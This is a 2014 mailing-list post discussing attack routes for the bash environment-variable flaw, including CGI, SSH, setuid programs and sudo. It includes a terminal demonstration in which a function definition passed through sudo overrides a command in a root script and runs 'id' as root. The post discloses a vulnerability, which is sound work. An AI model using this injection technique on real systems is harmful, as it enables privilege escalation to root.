On 26 September 2014 10:26, Nikolaus Rath <nikol...@rath.org> wrote: > Wasn't there some web server that used to put query script variables > into the environment of the CGI script? Or am I confusing that with > PHP's evil register_globals? >
CGI is just one avenue for attack. There are other avenues. e.g. the ssh one, if I understand correctly, would allow setting any environment variable to any value. See list of packages here: https://access.redhat.com/articles/1200223 In addition, if there are any setuid/setgid program, either in Debian or installed locally, that make external calls to bash, these would be vulnerable. I thought sudo was suppose to be ok, sure doesn't look ok to me. brian@aquitard:~$ sudo echo='() { /bin/echo bar; }' bash root@aquitard:/home/brian# echo hello bar brian@aquitard:~$ sudo echo='() { /bin/echo bar; }' ./test.sh bar brian@aquitard:~$ sudo echo='() { /bin/echo bar; id; }' ./test.sh bar uid=0(root) gid=0(root) groups=0(root) -- Brian May <br...@microcomaustralia.com.au>
